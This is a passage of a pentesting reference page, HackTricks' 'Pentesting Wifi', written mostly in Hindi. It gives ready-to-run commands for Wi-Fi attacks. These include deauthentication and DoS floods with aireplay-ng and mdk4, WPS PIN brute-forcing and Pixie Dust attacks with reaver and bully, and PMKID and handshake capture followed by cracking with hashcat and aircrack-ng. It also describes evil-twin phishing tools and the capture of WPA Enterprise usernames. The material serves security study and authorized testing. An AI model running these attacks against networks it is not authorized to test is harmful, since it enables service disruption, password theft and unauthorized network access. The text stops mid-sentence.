Pentesting Wifi

Reading time: 41 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

सदस्यता योजनाएँ देखें!
हमारे 💬 Discord समूह या टेलीग्राम समूह में शामिल हों या हमारे Twitter 🐦 @hacktricks_live** का पालन करें।**
हैकिंग ट्रिक्स साझा करें और HackTricks और HackTricks Cloud गिटहब रिपोजिटरी में PRs सबमिट करें।

Wifi बुनियादी कमांड

bash

ip link show #List available interfaces
iwconfig #List available interfaces
airmon-ng check kill #Kill annoying processes
airmon-ng start wlan0 #Monitor mode
airmon-ng stop wlan0mon #Managed mode
airodump-ng wlan0mon #Scan (default 2.4Ghz)
airodump-ng wlan0mon --band a #Scan 5Ghz
airodump-ng wlan0mon --wps #Scan WPS
iwconfig wlan0 mode monitor #Put in mode monitor
iwconfig wlan0mon mode managed #Quit mode monitor - managed mode
iw dev wlan0 scan | grep "^BSS\|SSID\|WSP\|Authentication\|WPS\|WPA" #Scan available wifis
iwlist wlan0 scan #Scan available wifis

Tools

EAPHammer

git clone https://github.com/s0lst1c3/eaphammer.git
./kali-setup

Airgeddon

bash

mv `which dhcpd` `which dhcpd`.old
apt install isc-dhcp-server
apt-get install sslstrip asleap bettercap mdk4 hostapd beef-xss lighttpd dsniff hostapd-wpe

डॉकर के साथ एयरगेडन चलाएँ

bash

docker run \
--rm \
-ti \
--name airgeddon \
--net=host \
--privileged \
-p 3000:3000 \
-v /tmp:/io \
-e DISPLAY=$(env | grep DISPLAY | awk -F "=" '{print $2}') \
v1s1t0r1sh3r3/airgeddon

wifiphisher

यह Evil Twin, KARMA, और Known Beacons हमले कर सकता है और फिर एक फ़िशिंग टेम्पलेट का उपयोग करके नेटवर्क का असली पासवर्ड प्राप्त करने या सोशल नेटवर्क क्रेडेंशियल्स कैप्चर करने में सक्षम होता है।

bash

git clone https://github.com/wifiphisher/wifiphisher.git # Download the latest revision
cd wifiphisher # Switch to tool's directory
sudo python setup.py install # Install any dependencies

Wifite2

यह उपकरण WPS/WEP/WPA-PSK हमलों को स्वचालित करता है। यह स्वचालित रूप से:

इंटरफ़ेस को मॉनिटर मोड में सेट करें
संभावित नेटवर्क के लिए स्कैन करें - और आपको पीड़ित(ों) का चयन करने दें
यदि WEP - WEP हमले शुरू करें
यदि WPA-PSK
यदि WPS: पिक्सी डस्ट हमला और ब्रूटफोर्स हमला (सावधान रहें, ब्रूट-फोर्स हमला लंबा समय ले सकता है)। ध्यान दें कि यह शून्य PIN या डेटाबेस/जनरेटेड PINs का प्रयास नहीं करता है।
इसे क्रैक करने के लिए AP से PMKID कैप्चर करने का प्रयास करें
एक हैंडशेक कैप्चर करने के लिए AP के क्लाइंट को डिअथेंटिकेट करने का प्रयास करें
यदि PMKID या हैंडशेक, तो शीर्ष 5000 पासवर्ड का उपयोग करके ब्रूटफोर्स करने का प्रयास करें।

हमलों का सारांश

DoS
डिअथेंटिकेशन/डिसएसोसिएशन -- सभी को डिस्कनेक्ट करें (या एक विशिष्ट ESSID/क्लाइंट)
यादृच्छिक नकली APs -- नेटवर्क छिपाएं, संभावित स्कैनर्स को क्रैश करें
AP को ओवरलोड करें -- AP को मारने का प्रयास करें (आमतौर पर बहुत उपयोगी नहीं)
WIDS -- IDS के साथ खेलें
TKIP, EAPOL -- कुछ विशिष्ट हमले कुछ APs को DoS करने के लिए
क्रैकिंग
WEP क्रैक करें (कई उपकरण और विधियाँ)
WPA-PSK
WPS पिन "ब्रूट-फोर्स"
WPA PMKID ब्रूटफोर्स
[DoS +] WPA हैंडशेक कैप्चर + क्रैकिंग
WPA-MGT
यूजरनेम कैप्चर
ब्रूटफोर्स क्रेडेंशियल्स
ईविल ट्विन (DoS के साथ या बिना)
ओपन ईविल ट्विन [+ DoS] -- कैप्टिव पोर्टल क्रेड्स कैप्चर करने और/या LAN हमले करने के लिए उपयोगी
WPA-PSK ईविल ट्विन -- यदि आप पासवर्ड जानते हैं तो नेटवर्क हमलों के लिए उपयोगी
WPA-MGT -- कंपनी के क्रेडेंशियल्स कैप्चर करने के लिए उपयोगी
KARMA, MANA, लाउड MANA, जाने-माने बीकन
+ ओपन -- कैप्टिव पोर्टल क्रेड्स कैप्चर करने और/या LAN हमले करने के लिए उपयोगी
+ WPA -- WPA हैंडशेक कैप्चर करने के लिए उपयोगी

डिअथेंटिकेशन हमले, Wi-Fi हैकिंग में एक सामान्य विधि, "प्रबंधन" फ़्रेमों को जाली बनाने में शामिल होते हैं ताकि डिवाइस को नेटवर्क से बलात्कारी रूप से डिस्कनेक्ट किया जा सके। ये अनएन्क्रिप्टेड पैकेट क्लाइंट्स को यह विश्वास दिलाते हैं कि वे वैध नेटवर्क से हैं, जिससे हमलावरों को WPA हैंडशेक एकत्र करने या नेटवर्क कनेक्शनों को लगातार बाधित करने की अनुमति मिलती है। यह रणनीति, अपनी सरलता में चौंकाने वाली, व्यापक रूप से उपयोग की जाती है और नेटवर्क सुरक्षा के लिए महत्वपूर्ण प्रभाव डालती है।

Aireplay-ng का उपयोग करके डिअथेंटिकेशन

aireplay-ng -0 0 -a 00:14:6C:7E:40:80 -c 00:0F:B5:34:30:30 ath0

-0 का मतलब है डिऑथेंटिकेशन
1 डिऑथ्स की संख्या है जो भेजी जानी है (आप चाहें तो कई भेज सकते हैं); 0 का मतलब है कि उन्हें लगातार भेजें
-a 00:14:6C:7E:40:80 एक्सेस पॉइंट का MAC पता है
-c 00:0F:B5:34:30:30 क्लाइंट का MAC पता है जिसे डिऑथेंटिकेट करना है; यदि इसे छोड़ दिया जाए तो ब्रॉडकास्ट डिऑथेंटिकेशन भेजा जाता है (हमेशा काम नहीं करता)
ath0 इंटरफेस का नाम है

डिसएसोसिएशन पैकेट्स

डिसएसोसिएशन पैकेट्स, डिऑथेंटिकेशन पैकेट्स के समान, Wi-Fi नेटवर्क में उपयोग किए जाने वाले प्रबंधन फ्रेम का एक प्रकार हैं। ये पैकेट एक डिवाइस (जैसे लैपटॉप या स्मार्टफोन) और एक एक्सेस पॉइंट (AP) के बीच कनेक्शन को तोड़ने के लिए कार्य करते हैं। डिसएसोसिएशन और डिऑथेंटिकेशन के बीच मुख्य अंतर उनके उपयोग के परिदृश्यों में है। जबकि एक AP नेटवर्क से बुरे डिवाइसों को स्पष्ट रूप से हटाने के लिए डिऑथेंटिकेशन पैकेट्स उत्सर्जित करता है, डिसएसोसिएशन पैकेट्स आमतौर पर तब भेजे जाते हैं जब AP बंद हो रहा है, पुनः प्रारंभ हो रहा है, या स्थानांतरित हो रहा है, जिससे सभी जुड़े नोड्स का डिस्कनेक्शन आवश्यक हो जाता है।

यह हमला mdk4(mode "d") द्वारा किया जा सकता है:

bash

# -c <channel>
# -b victim_client_mac.txt contains the MAC address of the device to eliminate
# -e WifiName is the name of the wifi
# -B BSSID is the BSSID of the AP
# Notice that these and other parameters aare optional, you could give onli the ESSID and md4k will automatically search for it, wait for finding clients and deauthenticate them
mdk4 wlan0mon d -c 5 -b victim_client_mac.txt -E WifiName -B EF:60:69:D7:69:2F

mdk4 द्वारा अधिक DOS हमले

यहां यहां.

हमला मोड b: बीकन बाढ़

क्लाइंट्स पर नकली APs दिखाने के लिए बीकन फ़्रेम भेजता है। यह कभी-कभी नेटवर्क स्कैनर्स और यहां तक कि ड्राइवरों को भी क्रैश कर सकता है!

bash

# -a Use also non-printable caracters in generated SSIDs and create SSIDs that break the 32-byte limit
# -w n (create Open) t (Create WPA/TKIP) a (Create WPA2/AES)
# -m use real BSSIDS
# All the parameters are optional and you could load ESSIDs from a file
mdk4 wlan0mon b -a -w nta -m

ATTACK MODE a: Authentication Denial-Of-Service

सभी सुलभ एक्सेस पॉइंट्स (APs) को ऑथेंटिकेशन फ्रेम भेजने से इन APs पर ओवरलोड हो सकता है, खासकर जब कई क्लाइंट शामिल होते हैं। यह तीव्र ट्रैफिक सिस्टम की अस्थिरता का कारण बन सकता है, जिससे कुछ APs फ्रीज या यहां तक कि रीसेट हो सकते हैं।

bash

# -a BSSID send random data from random clients to try the DoS
# -i BSSID capture and repeat pakets from authenticated clients
# -m use real MACs
# only -a or -i can be used
mdk4 wlan0mon a [-i EF:60:69:D7:69:2F] [-a EF:60:69:D7:69:2F] -m

ATTACK MODE p: SSID Probing and Bruteforcing

Access Points (APs) की जांच करना यह सुनिश्चित करता है कि SSID सही तरीके से प्रकट किया गया है और AP की रेंज की पुष्टि करता है। यह तकनीक, छिपे हुए SSIDs को शब्द सूची के साथ या बिना ब्रूटफोर्सिंग के साथ मिलाकर, छिपे हुए नेटवर्क की पहचान और पहुंच में मदद करती है।

ATTACK MODE m: Michael Countermeasures Exploitation

विभिन्न QoS कतारों में यादृच्छिक या डुप्लिकेट पैकेट भेजने से TKIP APs पर माइकल काउंटरमेजर्स को सक्रिय किया जा सकता है, जिससे एक मिनट के लिए AP बंद हो जाता है। यह विधि एक प्रभावी DoS (Denial of Service) हमले की रणनीति है।

bash

# -t <BSSID> of a TKIP AP
# -j use inteligent replay to create the DoS
mdk4 wlan0mon m -t EF:60:69:D7:69:2F [-j]

ATTACK MODE e: EAPOL Start और Logoff Packet Injection

एक AP को EAPOL Start फ्रेम के साथ बाढ़ में डालने से फर्जी सत्र बनते हैं, AP को ओवरलोड करते हैं और वैध क्लाइंट्स को ब्लॉक करते हैं। वैकल्पिक रूप से, फर्जी EAPOL Logoff संदेश इंजेक्ट करने से क्लाइंट्स को मजबूरन डिस्कनेक्ट किया जाता है, दोनों विधियाँ नेटवर्क सेवा को प्रभावी रूप से बाधित करती हैं।

bash

# Use Logoff messages to kick clients
mdk4 wlan0mon e -t EF:60:69:D7:69:2F [-l]

ATTACK MODE s: IEEE 802.11s मेष नेटवर्क के लिए हमले

मेष नेटवर्क में लिंक प्रबंधन और रूटिंग पर विभिन्न हमले।

ATTACK MODE w: WIDS भ्रम

क्लाइंट्स को कई WDS नोड्स या नकली रॉग APs से क्रॉस-कनेक्ट करना Intrusion Detection और Prevention Systems को प्रभावित कर सकता है, जिससे भ्रम और संभावित सिस्टम दुरुपयोग उत्पन्न होता है।

bash

# -z activate Zero_Chaos' WIDS exploit (authenticates clients from a WDS to foreign APs to make WIDS go nuts)
mkd4 -e <SSID> -c <channel> [-z]

ATTACK MODE f: Packet Fuzzer

एक पैकेट फज़्ज़र जिसमें विभिन्न पैकेट स्रोत और पैकेट हेरफेर के लिए एक व्यापक सेट के संशोधक शामिल हैं।

Airggedon

Airgeddon पिछले टिप्पणियों में प्रस्तावित अधिकांश हमलों की पेशकश करता है:

WPS

WPS (Wi-Fi Protected Setup) उपकरणों को राउटर से जोड़ने की प्रक्रिया को सरल बनाता है, WPA या WPA2 व्यक्तिगत के साथ एन्क्रिप्टेड नेटवर्क के लिए सेटअप की गति और आसानी को बढ़ाता है। यह आसानी से समझौता किए गए WEP सुरक्षा के लिए अप्रभावी है। WPS एक 8-अंक का PIN का उपयोग करता है, जिसे दो भागों में मान्य किया जाता है, जिससे यह सीमित संयोजनों (11,000 संभावनाएँ) के कारण ब्रूट-फोर्स हमलों के प्रति संवेदनशील हो जाता है।

WPS Bruteforce

इस क्रिया को करने के लिए 2 मुख्य उपकरण हैं: Reaver और Bully।

Reaver को WPS के खिलाफ एक मजबूत और व्यावहारिक हमले के लिए डिज़ाइन किया गया है, और इसे विभिन्न प्रकार के एक्सेस पॉइंट और WPS कार्यान्वयन के खिलाफ परीक्षण किया गया है।
Bully WPS ब्रूट फोर्स हमले का नया कार्यान्वयन है, जो C में लिखा गया है। इसमें मूल रीवर कोड की तुलना में कई लाभ हैं: कम निर्भरताएँ, बेहतर मेमोरी और CPU प्रदर्शन, एंडियननेस का सही प्रबंधन, और विकल्पों का एक अधिक मजबूत सेट।

यह हमला WPS PIN की संवेदनशीलता का लाभ उठाता है, विशेष रूप से पहले चार अंकों के उजागर होने और अंतिम अंक की चेकसम के रूप में भूमिका, जिससे ब्रूट-फोर्स हमले को आसान बनाता है। हालाँकि, ब्रूट-फोर्स हमलों के खिलाफ सुरक्षा, जैसे आक्रामक हमलावरों के MAC पते को ब्लॉक करना, हमले को जारी रखने के लिए MAC पते की घुमाव की मांग करती है।

Bully या Reaver जैसे उपकरणों के साथ WPS PIN प्राप्त करने पर, हमलावर WPA/WPA2 PSK का अनुमान लगा सकता है, जिससे स्थायी नेटवर्क पहुंच सुनिश्चित होती है।

bash

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -b -f -N [-L -d 2] -vvroot
bully wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -S -F -B -v 3

स्मार्ट ब्रूट फोर्स

यह परिष्कृत दृष्टिकोण ज्ञात कमजोरियों का उपयोग करके WPS PINs को लक्षित करता है:

पूर्व-खोजे गए PINs: उन विशिष्ट निर्माताओं से जुड़े ज्ञात PINs का एक डेटाबेस उपयोग करें जो समान WPS PINs का उपयोग करते हैं। यह डेटाबेस MAC-पते के पहले तीन ऑक्टेट्स को इन निर्माताओं के संभावित PINs के साथ सहसंबंधित करता है।
PIN जनरेशन एल्गोरिदम: ComputePIN और EasyBox जैसे एल्गोरिदम का लाभ उठाएं, जो AP के MAC-पते के आधार पर WPS PINs की गणना करते हैं। Arcadyan एल्गोरिदम को अतिरिक्त रूप से एक डिवाइस ID की आवश्यकता होती है, जो PIN जनरेशन प्रक्रिया में एक परत जोड़ती है।

WPS पिक्सी डस्ट हमला

डोमिनिक बोंगार्ड ने कुछ एक्सेस पॉइंट्स (APs) में गुप्त कोड बनाने के संबंध में एक दोष खोजा, जिसे नॉनसेस (E-S1 और E-S2) के रूप में जाना जाता है। यदि इन नॉनसेस का पता लगाया जा सकता है, तो AP के WPS PIN को क्रैक करना आसान हो जाता है। AP एक विशेष कोड (हैश) के भीतर PIN प्रकट करता है ताकि यह साबित हो सके कि यह वैध है और कोई नकली (रोग) AP नहीं है। ये नॉनसेस मूल रूप से "सुरक्षित" को "खोलने" के लिए "चाबियाँ" हैं जो WPS PIN को रखती हैं। इस पर अधिक जानकारी यहाँ मिल सकती है।

सरल शब्दों में, समस्या यह है कि कुछ APs ने कनेक्शन प्रक्रिया के दौरान PIN को एन्क्रिप्ट करने के लिए पर्याप्त यादृच्छिक कुंजियों का उपयोग नहीं किया। इससे PIN को नेटवर्क के बाहर से अनुमानित किया जा सकता है (ऑफलाइन ब्रूट फोर्स हमला)।

bash

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -K 1 -N -vv
bully  wlan1mon -b 00:C0:CA:78:B1:37 -d -v 3

यदि आप डिवाइस को मॉनिटर मोड में स्विच नहीं करना चाहते हैं, या reaver और bully में कुछ समस्या है, तो आप OneShot-C आजमा सकते हैं। यह उपकरण Pixie Dust हमले को मॉनिटर मोड में स्विच किए बिना प्रदर्शन कर सकता है।

bash

./oneshot -i wlan0 -K -b 00:C0:CA:78:B1:37

Null Pin हमला

कुछ खराब डिज़ाइन किए गए सिस्टम एक Null PIN (खाली या गैर-मौजूद PIN) को एक्सेस देने की अनुमति देते हैं, जो कि काफी असामान्य है। उपकरण Reaver इस कमजोरियों का परीक्षण करने में सक्षम है, जबकि Bully नहीं है।

bash

reaver -i wlan1mon -b 00:C0:CA:78:B1:37 -c 9 -f -N -g 1 -vv -p ''

Airgeddon

सभी प्रस्तावित WPS हमले airgeddon का उपयोग करके आसानी से किए जा सकते हैं।

5 और 6 आपको आपका कस्टम PIN आजमाने की अनुमति देते हैं (यदि आपके पास कोई है)
7 और 8 Pixie Dust हमला करते हैं
13 आपको NULL PIN का परीक्षण करने की अनुमति देता है
11 और 12 उपलब्ध डेटाबेस से चयनित AP से संबंधित PINs को पुनः प्राप्त करेंगे और संभावित PINs उत्पन्न करेंगे: ComputePIN, EasyBox और वैकल्पिक रूप से Arcadyan (सिफारिश की, क्यों नहीं?)
9 और 10 हर संभावित PIN का परीक्षण करेंगे

WEP

अब यह बहुत टूटा हुआ और अप्रयुक्त है। बस जान लें कि airgeddon के पास इस प्रकार की सुरक्षा पर हमला करने के लिए "All-in-One" नाम का एक WEP विकल्प है। अधिक उपकरण समान विकल्प प्रदान करते हैं।

WPA/WPA2 PSK

PMKID

2018 में, hashcat प्रकट किया एक नया हमला विधि, जो अद्वितीय है क्योंकि इसे केवल एक ही पैकेट की आवश्यकता होती है और इसे लक्ष्य AP से जुड़े किसी भी क्लाइंट की आवश्यकता नहीं होती—बस हमलावर और AP के बीच बातचीत।

कई आधुनिक राउटर संघ के दौरान पहले EAPOL फ्रेम में एक वैकल्पिक फ़ील्ड जोड़ते हैं, जिसे Robust Security Network के रूप में जाना जाता है। इसमें PMKID शामिल है।

जैसा कि मूल पोस्ट में बताया गया है, PMKID ज्ञात डेटा का उपयोग करके बनाया जाता है:

bash

PMKID = HMAC-SHA1-128(PMK, "PMK Name" | MAC_AP | MAC_STA)

यह मानते हुए कि "PMK नाम" स्थिर है, हमें AP और स्टेशन का BSSID पता है, और PMK एक पूर्ण 4-वे हैंडशेक से समान है, hashcat इस जानकारी का उपयोग PSK को क्रैक करने और पासफ़्रेज़ को पुनर्प्राप्त करने के लिए कर सकता है!

इस जानकारी को इकट्ठा करने और पासवर्ड को स्थानीय रूप से ब्रूटफोर्स करने के लिए आप कर सकते हैं:

bash

airmon-ng check kill
airmon-ng start wlan0
git clone https://github.com/ZerBea/hcxdumptool.git; cd hcxdumptool; make; make install
hcxdumptool -o /tmp/attack.pcap -i wlan0mon --enable_status=1

bash

#You can also obtains PMKIDs using eaphammer
./eaphammer --pmkid --interface wlan0 --channel 11 --bssid 70:4C:A5:F8:9A:C1

कैप्चर किए गए PMKIDs कंसोल में दिखाए जाएंगे और /tmp/attack.pcap के अंदर भी सहेजे जाएंगे।
अब, कैप्चर को hashcat/john प्रारूप में परिवर्तित करें और इसे क्रैक करें:

bash

hcxtools/hcxpcaptool -z hashes.txt /tmp/attack.pcapng
hashcat -m 16800 --force hashes.txt /usr/share/wordlists/rockyou.txt
john hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

कृपया ध्यान दें कि एक सही हैश का प्रारूप 4 भागों में होता है, जैसे: 4017733ca8db33a1479196c2415173beb808d7b83cfaa4a6a9a5aae7566f6461666f6e65436f6e6e6563743034383131343838 यदि आपका केवल 3 भाग है, तो यह अमान्य है (PMKID कैप्चर मान्य नहीं था)।

ध्यान दें कि hcxdumptool हैंडशेक भी कैप्चर करता है (कुछ ऐसा दिखाई देगा: MP:M1M2 RC:63258 EAPOLTIME:17091)। आप हैंडशेक को hashcat/john प्रारूप में cap2hccapx का उपयोग करके परिवर्तित कर सकते हैं।

bash

tcpdump -r /tmp/attack.pcapng -w /tmp/att.pcap
cap2hccapx pmkid.pcapng pmkid.hccapx ["Filter_ESSID"]
hccap2john pmkid.hccapx > handshake.john
john handshake.john --wordlist=/usr/share/wordlists/rockyou.txt
aircrack-ng /tmp/att.pcap -w /usr/share/wordlists/rockyou.txt #Sometimes

मैंने देखा है कि इस उपकरण से कैप्चर किए गए कुछ हैंडशेक को सही पासवर्ड जानने के बावजूद क्रैक नहीं किया जा सका। मैं सुझाव दूंगा कि यदि संभव हो तो पारंपरिक तरीके से भी हैंडशेक कैप्चर करें, या इस उपकरण का उपयोग करके उनमें से कई कैप्चर करें।

हैंडशेक कैप्चर

WPA/WPA2 नेटवर्क पर एक हमला हैंडशेक को कैप्चर करके और पासवर्ड को ऑफलाइन क्रैक करने का प्रयास करके किया जा सकता है। इस प्रक्रिया में एक विशिष्ट नेटवर्क और BSSID की संचार को मॉनिटर करना शामिल है, एक विशेष चैनल पर। यहाँ एक संक्षिप्त गाइड है:

लक्ष्य नेटवर्क का BSSID, चैनल, और एक कनेक्टेड क्लाइंट पहचानें।
निर्दिष्ट चैनल और BSSID पर नेटवर्क ट्रैफ़िक की निगरानी करने के लिए airodump-ng का उपयोग करें, उम्मीद है कि एक हैंडशेक कैप्चर हो सके। कमांड इस तरह दिखेगा:

bash

airodump-ng wlan0 -c 6 --bssid 64:20:9F:15:4F:D7 -w /tmp/psk --output-format pcap

हैंडशेक कैप्चर करने के मौके को बढ़ाने के लिए, क्लाइंट को नेटवर्क से अस्थायी रूप से डिस्कनेक्ट करें ताकि पुनः प्रमाणीकरण को मजबूर किया जा सके। यह aireplay-ng कमांड का उपयोग करके किया जा सकता है, जो क्लाइंट को डिअथेंटिकेशन पैकेट भेजता है:

bash

aireplay-ng -0 0 -a 64:20:9F:15:4F:D7 wlan0 #Send generic deauth packets, may not work in all scenarios

ध्यान दें कि जब क्लाइंट को डिऑथेंटिकेट किया गया था, तो यह किसी अन्य AP से कनेक्ट करने की कोशिश कर सकता है या, अन्य मामलों में, किसी अन्य नेटवर्क से।

जब airodump-ng में कुछ हैंडशेक जानकारी दिखाई देती है, तो इसका मतलब है कि हैंडशेक कैप्चर किया गया था और आप सुनना बंद कर सकते हैं:

एक बार हैंडशेक कैप्चर हो जाने के बाद, आप इसे aircrack-ng के साथ क्रैक कर सकते हैं:

aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 64:20:9F:15:4F:D7 /tmp/psk*.cap

फ़ाइल में हैंडशेक की जांच करें

aircrack

bash

aircrack-ng psk-01.cap #Search your bssid/essid and check if any handshake was capture

tshark

bash

tshark -r psk-01.cap -n -Y eapol #Filter handshake messages #You should have the 4 messages.

cowpatty

cowpatty -r psk-01.cap -s "ESSID" -f -

यदि यह उपकरण किसी ESSID का अधूरा हैंडशेक पूर्ण हैंडशेक से पहले पाता है, तो यह मान्य हैंडशेक का पता नहीं लगाएगा।

pyrit

bash

apt-get install pyrit #Not working for newer versions of kali
pyrit -r psk-01.cap analyze

WPA Enterprise (MGT)

In एंटरप्राइज WiFi सेटअप में, आप विभिन्न प्रमाणीकरण विधियों का सामना करेंगे, प्रत्येक विभिन्न सुरक्षा स्तरों और प्रबंधन सुविधाओं को प्रदान करती है। जब आप नेटवर्क ट्रैफ़िक का निरीक्षण करने के लिए airodump-ng जैसे उपकरणों का उपयोग करते हैं, तो आप इन प्रमाणीकरण प्रकारों के लिए पहचानकर्ता देख सकते हैं। कुछ सामान्य विधियों में शामिल हैं:

6A:FE:3B:73:18:FB  -58       19        0    0   1  195  WPA2 CCMP   MGT  NameOfMyWifi

EAP-GTC (Generic Token Card):

यह विधि हार्डवेयर टोकन और EAP-PEAP के भीतर एक-बार पासवर्ड का समर्थन करती है। MSCHAPv2 के विपरीत, यह एक पीयर चुनौती का उपयोग नहीं करती है और पासवर्ड को एक्सेस पॉइंट पर स्पष्ट रूप में भेजती है, जो डाउनग्रेड हमलों के लिए जोखिम पैदा करती है।

EAP-MD5 (Message Digest 5):

इसमें क्लाइंट से पासवर्ड का MD5 हैश भेजना शामिल है। यह सिफारिश नहीं की जाती है क्योंकि यह शब्दकोश हमलों के प्रति संवेदनशील है, सर्वर प्रमाणीकरण की कमी है, और सत्र-विशिष्ट WEP कुंजी उत्पन्न करने में असमर्थ है।

EAP-TLS (Transport Layer Security):

प्रमाणीकरण के लिए क्लाइंट-साइड और सर्वर-साइड प्रमाणपत्रों का उपयोग करता है और संचार को सुरक्षित करने के लिए उपयोगकर्ता-आधारित और सत्र-आधारित WEP कुंजी को गतिशील रूप से उत्पन्न कर सकता है।

EAP-TTLS (Tunneled Transport Layer Security):

एक एन्क्रिप्टेड टनल के माध्यम से आपसी प्रमाणीकरण प्रदान करता है, साथ ही उपयोगकर्ता-विशिष्ट, सत्र-विशिष्ट WEP कुंजी निकालने की विधि भी। यह केवल सर्वर-साइड प्रमाणपत्रों की आवश्यकता होती है, जिसमें क्लाइंट क्रेडेंशियल्स का उपयोग करते हैं।

PEAP (Protected Extensible Authentication Protocol):

यह EAP के समान कार्य करता है, सुरक्षित संचार के लिए TLS टनल बनाता है। यह टनल द्वारा प्रदान की गई सुरक्षा के कारण EAP के शीर्ष पर कमजोर प्रमाणीकरण प्रोटोकॉल के उपयोग की अनुमति देता है।
PEAP-MSCHAPv2: अक्सर PEAP के रूप में संदर्भित, यह संवेदनशील MSCHAPv2 चुनौती/प्रतिक्रिया तंत्र को एक सुरक्षात्मक TLS टनल के साथ जोड़ता है।
PEAP-EAP-TLS (या PEAP-TLS): EAP-TLS के समान है लेकिन प्रमाणपत्रों का आदान-प्रदान करने से पहले TLS टनल शुरू करता है, जो सुरक्षा की एक अतिरिक्त परत प्रदान करता है।

आप इन प्रमाणीकरण विधियों के बारे में अधिक जानकारी यहां और यहां प्राप्त कर सकते हैं।

Username Capture

https://tools.ietf.org/html/rfc3748#page-27 को पढ़ने पर ऐसा लगता है कि यदि आप EAP का उपयोग कर रहे हैं तो "Identity" messages का समर्थन होना चाहिए, और username "Response Identity" संदेशों में स्पष्ट रूप से भेजा जाएगा।

यहां तक कि सबसे सुरक्षित प्रमाणीकरण विधियों में से एक: PEAP-EAP-TLS का उपयोग करते समय भी, EAP प्रोटोकॉल में भेजे गए username को कैप्चर करना संभव है। ऐसा करने के लिए, एक प्रमाणीकरण संचार को कैप्चर करें (एक चैनल के भीतर airodump-ng शुरू करें और उसी इंटरफेस में wireshark) और पैकेट को eapol द्वारा फ़िल्टर करें।
"Response, Identity" पैकेट के भीतर, क्लाइंट का username दिखाई देगा।

Anonymous Identities

पहचान छिपाना EAP-PEAP और EAP-TTLS दोनों द्वारा समर्थित है। WiFi नेटवर्क के संदर्भ में, EAP-Identity अनुरोध आमतौर पर एसोसिएशन प्रक्रिया के दौरान एक्सेस पॉइंट (AP) द्वारा शुरू किया जाता है। उपयोगकर्ता की गुमनामी की सुरक्षा सुनिश्चित करने के लिए, उपयोगकर्ता के डिवाइस पर EAP क्लाइंट से प्रतिक्रिया में केवल प्रारंभिक RADIUS सर्वर द्वारा अनुरोध को संसाधित करने के लिए आवश्यक जानकारी होती है। इस अवधारणा को निम्नलिखित परिदृश्यों के माध्यम से दर्शाया गया है:

EAP-Identity = anonymous
इस परिदृश्य में, सभी उपयोगकर्ता अपने उपयोगकर्ता पहचानकर्ता के रूप में उपनाम "anonymous" का उपयोग करते हैं। प्रारंभिक RADIUS सर्वर या तो EAP-PEAP या EAP-TTLS सर्वर के रूप में कार्य करता है, जो PEAP या TTLS प्रोटोकॉल के सर्वर-साइड का प्रबंधन करता है। आंतरिक (सुरक्षित) प्रमाणीकरण विधि फिर या तो स्थानीय रूप से संभाली जाती है या एक दूरस्थ (होम) RADIUS सर्वर को सौंप दी जाती है।
EAP-Identity = anonymous@realm_x
इस स्थिति में, विभिन्न क्षेत्रों के उपयोगकर्ता अपनी पहचान छिपाते हैं जबकि अपने संबंधित क्षेत्रों का संकेत देते हैं। यह प्रारंभिक RADIUS सर्वर को EAP-PEAP या EAP-TTLS अनुरोधों को उनके होम क्षेत्रों में RADIUS सर्वरों को प्रॉक्सी करने की अनुमति देता है, जो PEAP या TTLS सर्वर के रूप में कार्य करते हैं। प्रारंभिक RADIUS सर्वर केवल एक RADIUS रिले नोड के रूप में कार्य करता है।
वैकल्पिक रूप से, प्रारंभिक RADIUS सर्वर EAP-PEAP या EAP-TTLS सर्वर के रूप में कार्य कर सकता है और या तो सुरक्षित प्रमाणीकरण विधि को संभाल सकता है या इसे किसी अन्य सर्वर को अग्रेषित कर सकता है। यह विकल्प विभिन्न क्षेत्रों के लिए विशिष्ट नीतियों को कॉन्फ़िगर करने की सुविधा प्रदान करता है।

EAP-PEAP में, एक बार जब PEAP सर्वर और PEAP क्लाइंट के बीच TLS टनल स्थापित हो जाती है, तो PEAP सर्वर एक EAP-Identity अनुरोध शुरू करता है और इसे TLS टनल के माध्यम से भेजता है। क्लाइंट इस दूसरे EAP-Identity अनुरोध का उत्तर EAP-Identity प्रतिक्रिया भेजकर देता है, जिसमें उपयोगकर्ता की वास्तविक पहचान एन्क्रिप्टेड टनल के माध्यम से होती है। यह दृष्टिकोण 802.11 ट्रैफ़िक पर किसी भी ईव्सड्रॉपिंग करने वाले को उपयोगकर्ता की वास्तविक पहचान प्रकट करने से प्रभावी रूप से रोकता है।

EAP-TTLS एक थोड़ी अलग प्रक्रिया का पालन करता है। EAP-TTLS के साथ, क्लाइंट आमतौर पर PAP या CHAP का उपयोग करके प्रमाणीकरण करता है, जो TLS टनल द्वारा सुरक्षित होता है। इस मामले में, क्लाइंट प्रारंभिक TLS संदेश में User-Name विशेषता और या तो Password या CHAP-Password विशेषता शामिल करता है जो टनल स्थापना के बाद भेजा जाता है।

चाहे जो भी प्रोटोकॉल चुना जाए, PEAP/TTLS सर्वर TLS टनल स्थापित होने के बाद उपयोगकर्ता की वास्तविक पहचान के बारे में जानकारी प्राप्त करता है। वास्तविक पहचान को user@realm या केवल user के रूप में दर्शाया जा सकता है। यदि PEAP/TTLS सर्वर उपयोगकर्ता को प्रमाणीकरण करने के लिए भी जिम्मेदार है, तो अब उसके पास उपयोगकर्ता की पहचान होती है और वह TLS टनल द्वारा सुरक्षित प्रमाणीकरण विधि के साथ आगे बढ़ता है। वैकल्पिक रूप से, PEAP/TTLS सर्वर उपयोगकर्ता के होम RADIUS सर्वर को एक नया RADIUS अनुरोध अग्रेषित कर सकता है। यह नया RADIUS अनुरोध PEAP या TTLS प्रोटोकॉल परत को छोड़ देता है। जहां सुरक्षित प्रमाणीकरण विधि EAP है, वहां आंतरिक EAP संदेशों को होम RADIUS सर्वर पर EAP-PEAP या EAP-TTLS आवरण के बिना भेजा जाता है। आउटगोइंग RADIUS संदेश की User-Name विशेषता उपयोगकर्ता की वास्तविक पहचान को शामिल करती है, जो आने वाले RADIUS अनुरोध से गुमनाम User-Name को प्रतिस्थापित करती है। जब सुरक्षित प्रमाणीकरण विधि PAP या CHAP (जो केवल TTLS द्वारा समर्थित है) होती है, तो TLS पेलोड से निकाली गई 